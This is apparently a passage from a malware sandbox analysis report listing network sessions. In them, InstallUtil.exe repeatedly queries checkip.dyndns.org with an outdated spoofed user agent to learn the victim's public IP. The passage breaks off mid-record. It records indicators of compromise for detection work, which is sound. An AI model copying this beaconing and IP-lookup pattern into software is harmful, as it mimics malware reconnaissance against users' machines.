                                                                                                                                                                    3192.168.2.549721158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:18.928136110 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:24.490513086 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:24 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: ffea57a928991934d8af846414139f1d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.549725158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:26.719578028 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:28.659517050 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:28 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 4746b0d51743a96a37ed3f51156c76c9
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.549728158.101.44.242807500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:30.015328884 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:10:30.665066004 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:30 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: c80ff8847ec6660db5ec25ad3d99e751
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.549730158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:30.822541952 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:31.433689117 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:31 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 7d45246160f0f72128c2095ce025a47d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.549732158.101.44.242807500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:34.061528921 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:34.633016109 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:34 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 2eafc63cc3080f50b077872485152aed
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.549733158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:34.115523100 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:34.715038061 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:34 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 8f84cbaa1bd1278bb8d776cdc785e583
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.549736158.101.44.242807500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:37.177220106 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:37.769226074 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:37 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 70acf502f22fad00b7592be3c8743b8d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.549737158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:37.180102110 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:37.753390074 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:37 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: ad86322b966b36c30a1959666ed6d08a
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    11192.168.2.549740158.101.44.242807500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:40.130079985 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:40.711698055 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:40 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: c32cb74fd4f1cdb4184554093a0419b4
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    12192.168.2.549741158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:40.130145073 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:40.713644981 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:40 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 48a3ea446f674bc03b63d1690172004a
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    13192.168.2.549744158.101.44.242807500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:43.201354027 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (